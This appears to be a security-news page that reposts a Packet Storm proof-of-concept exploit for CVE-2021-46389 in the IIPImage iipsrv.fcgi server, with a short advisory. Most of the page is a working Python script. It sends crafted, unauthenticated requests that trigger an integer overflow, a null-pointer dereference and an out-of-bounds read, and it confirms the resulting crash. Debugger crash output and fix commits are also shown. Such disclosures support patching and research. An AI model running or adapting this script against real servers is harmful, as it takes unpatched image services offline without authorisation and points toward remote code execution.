Security
Headlines
HeadlinesLatestCVEs

Headline

IIPImage Remote Memory Corruption

IIPImage is distributed with a server that enables advanced, high-performance image manipulation for web-based streaming and viewing of high resolution images. The server component called iipsrv.fcgi processes requests from users and passes them to command handlers. Several crashes including an integer overflow were discovered by sending malformed requests to the server, allowing remote users without authentication to perform denial-of-service attacks or potentially crafted for remote code execution as the server’s running user. Versions at least up to 1.1 may be affected.

Packet Storm
#vulnerability#web#ubuntu#linux#dos#rce#nginx#auth
#!/usr/bin/python3# -*- coding: UTF-8 -*-## thiel.py## IIPImage Multiple Remote Memory Corruption Vulnerabilities## Jeremy Brown [jbrown3264/gmail]## IIPImage is distributed with a server that enables advanced, high-performance# image manipulation for web-based streaming and viewing of high resolution images.# The server component called iipsrv.fcgi processes requests from users and passes# them to command handlers. Several crashes including an integer overflow were# discovered by sending malformed requests to the server, allowing remote users# without authentication to perform denial-of-service attacks or potentially# crafted for remote code execution as the server's running user.## Tested on Ubuntu 20.04 with NGINX fastcgi_pass localhost:9000 configuration## Demo## $ ./thiel.py http://10.0.0.201 --trigger iiif## (gdb) r --bind 0.0.0.0:9000 # 9000 for nginx comms, port 80 externally# ...## Thread 1 "iipsrv.fcgi" received signal SIGSEGV, Segmentation fault.# __memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:319# (gdb) i r# rax            0x7ffef6d50b68      140733039577960# rbx            0xffffffff          4294967295# rcx            0xb3                179# rdx            0x6                 6# rsi            0x5555556ae20d      93824993649165# rdi            0x7ffef6d50b68      140733039577960# rbp            0x7fffffffc690      0x7fffffffc690# rsp            0x7fffffffc4b8      0x7fffffffc4b8# r8             0x0                 0# r9             0x0                 0# r10            0x55555564f4e0      93824993260768# r11            0x7ffef6d50b68      140733039577960# r12            0xb58               2904# r13            0x81                129# r14            0x1e4               484# r15            0x8                 8# rip            0x7ffff7a53708      0x7ffff7a53708 <__memmove_avx_unaligned_erms+152>## => 0x7ffff7a53708 <__memmove_avx_unaligned_erms+152>:  mov    ecx,DWORD PTR [rsi+rdx*1-0x4]## 0  __memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:319# 1  0x0000555555573b5c in memcpy (__len=6, __src=<optimized out>, __dest=<optimized out>) at /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34# 2  TileManager::getRegion (this=this@entry=0x7fffffffc7d0, res=res@entry=0, seq=0, ang=90, layers=0, x=<optimized out>, y=<optimized out>, width=<optimized out>, height=<optimized out>) at TileManager.cc:470# 3  0x000055555558c914 in CVT::send (this=this@entry=0x7fffffffd390, session=session@entry=0x7fffffffd8b0) at CVT.cc:222# 4  0x000055555559a06e in IIIF::run (this=0x5555555e2e20, session=0x7fffffffd8b0, src=...) at IIIF.cc:656# 5  0x0000555555566cf4 in main (argc=<optimized out>, argv=<optimized out>) at Main.cc:741## Fixes# - commits 4ed59265fbbd636dc2fbbf325f8ea37ed300a6d9, 882925b295a80ec992063deffc2a3b0d803c3195## CVE-2021-46389#import osimport sysimport argparseimport signalimport requestsPATH = '/fcgi-bin/iipsrv.fcgi'## also there's many params for some functions like fif such as obj, qlt, sds,# cnt, cvt, wid, rgn, etc so the code definitely needs lots of input validation#QUERY_FIF = '?fif='QUERY_IIIF = '?iiif='QUERY_SPECTRA = '?spectra='## Some bugs require a valid file (eg. tiled TIF) to be present on the server (eg. IIIF big region)## sample: https://openslide.cs.cmu.edu/download/openslide-testdata/Generic-TIFF/CMU-1.tiff#VALID_FILE = '/var/www/test.tif'### BUGS ##### Bug #1: Integer overflow @ TileManager::getRegion()## Thread 1 "iipsrv.fcgi" received signal SIGSEGV, Segmentation fault.# __memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:319## REQ = QUERY_IIIF + VALID_FILE + '/full,32883,500,500/256,/0/default.jpg' # image# REQ = QUERY_IIIF + VALID_FILE + '/full,32884,500,500/256,/0/default.jpg' # image errorREQ_IIIF = QUERY_IIIF + VALID_FILE + '/full,32912,500,500/256,/0/default.jpg' # SIGSEGV# REQ_FIF_WID = QUERY_FIF + VALID_FILE + '&wid=652455&cvt=jpeg' # SIGSEGV (starts at CVT::run instead of IIIF:run)## Bug #2: NULL ptr deref @ SPECTRA::run## Thread 1 "iipsrv.fcgi" received signal SIGSEGV, Segmentation fault.# SPECTRA::run (this=0x5555555e2f70, session=0x7fffffffd8b0, argument=...) at IIPImage.h:335# 335    unsigned int getTileWidth() { return tile_width; };#REQ_SPECTRA = QUERY_SPECTRA + 'x' # no valid file necessary## Bug #3: Another crash @ JTL::run## Thread 1 "iipsrv.fcgi" received signal SIGSEGV, Segmentation fault.# JTL::send (this=this@entry=0x5555555e3200, session=session@entry=0x7fffffffd8c0, resolution=resolution@entry=129165, tile=tile@entry=1) at IIPImage.h:324# 324    unsigned int getImageWidth( int n=0 ) { return image_widths[n]; };#REQ_FIF_JTL = QUERY_FIF + VALID_FILE + '&jtl=129500,1' # try larger value if no crash#### END BUGS ###class Thiel(object):    def __init__(self, args):        self.host = args.host        self.trigger = args.trigger    def run(self):        if(self.trigger == None):            print("error: choose which bug use via --trigger")            return -1        if(self.trigger == 'iiif'):            return self.sendRequest(self.host, REQ_IIIF)        if(self.trigger == 'spectra'):            return self.sendRequest(self.host, REQ_SPECTRA)        if(self.trigger == 'fif_jtl'):            return self.sendRequest(self.host, REQ_FIF_JTL)        return 0    def sendRequest(self, host, req):        session = requests.Session()        try:            resp = session.get(host + PATH + req)        except Exception as error:            print("Error: %s" % error)            return -1        if(b'502 Bad Gateway' in resp.content):            print("done\n")            return 0        else:            print("[-] iipsrv still appears to be up\n")            return -1def signalExit():    sys.exit(-1)def arg_parse():    parser = argparse.ArgumentParser()    parser.add_argument("host",                        type=str,                        help="target host")    parser.add_argument("--trigger",                        "--trigger",                        type=str,                        choices=['iiif', 'spectra', 'fif_jtl'],                        help="which bug to trigger")    args = parser.parse_args()    return argsdef main():    signal.signal(signal.SIGINT, signalExit)    args = arg_parse()    pt = Thiel(args)    result = pt.run()    if(result > 0):        sys.exit(-1)if(__name__ == '__main__'):    main()

Packet Storm: Latest News

Ubuntu Security Notice USN-7089-6